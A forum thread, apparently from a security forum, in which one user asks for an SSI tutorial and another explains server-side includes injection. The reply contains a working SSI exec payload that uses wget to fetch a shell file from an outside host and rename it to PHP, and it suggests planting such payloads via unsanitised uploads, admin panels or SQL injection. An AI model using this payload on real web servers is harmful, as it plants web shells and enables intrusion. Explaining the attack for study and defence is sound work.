Server Side Injection Issues
#1
I am doing an online training and I have to know about server side injections.

Could someone please refer me to a GOOD online tutorial that explains SSI in depth for a beginner?

Thanks.

Best,

QMark
Reply
#2
From what I understand, Server-side Injection is based on exploiting SSI (Server Side Includes; a simple interpreted server-side scripting language used almost exclusively for the Web).

So I think it can easily be seen as some sort of dynamic HTML based on the server-side instead of client-side. Using either some of the extensions like: .shtml, .shtm, .stm; and to have the webserver is configured to allow SSI: http://httpd.apache.org/docs/2.2/howto/s...onfiguring

For example, blog.shtml contains the following:
Code:
<!--#include virtual="../quote.txt" -->
Which includes a daily quotation. With one change to the file, all the files including blog.shtml will change its content too.

You should read more here: https://en.wikipedia.org/wiki/Server_Side_Includes

So you can try to change code or add your own code to the SSI enabled pages to exploit it. Like:
Code:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
Spawning a shell and such.

You should read more on owasp: https://www.owasp.org/index.php/Server-S..._Injection

As for how you manage to change or add code, you just need to look for ways to manipulate the page. Through other vulnerabilities or otherwise. For example:
Persistent XSS.
* If there's any page uploads without proper sanitazing you can try uploading a shell or .shtml file payload: https://greysec.net/showthread.php?tid=1455
* Maybe get into their CMS/admin/cpanel where you can add new pages or posts.
* Or maybe you've found an SQL injection vulnerability, you can try insert a new page, post or content into the page.

Just need to think outside the box I guess. Also for the record for any questions on how attacks work, I highly recommand you read the owasp wiki on it.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [SSI] Server-Side Includes Injection. [Tutorial] Insider 4 1,651 03-27-2020, 04:55 PM
Last Post: Insider
  Basics of website and server hacking Insider 0 1,128 03-26-2020, 09:34 PM
Last Post: Insider
  Second Order SQL Injection Attacks thunder 1 1,416 05-20-2019, 01:06 PM
Last Post: Insider
  Re-posted and Updated [Complete MySQL Injection] Insider 5 11,927 04-28-2019, 09:46 PM
Last Post: thunder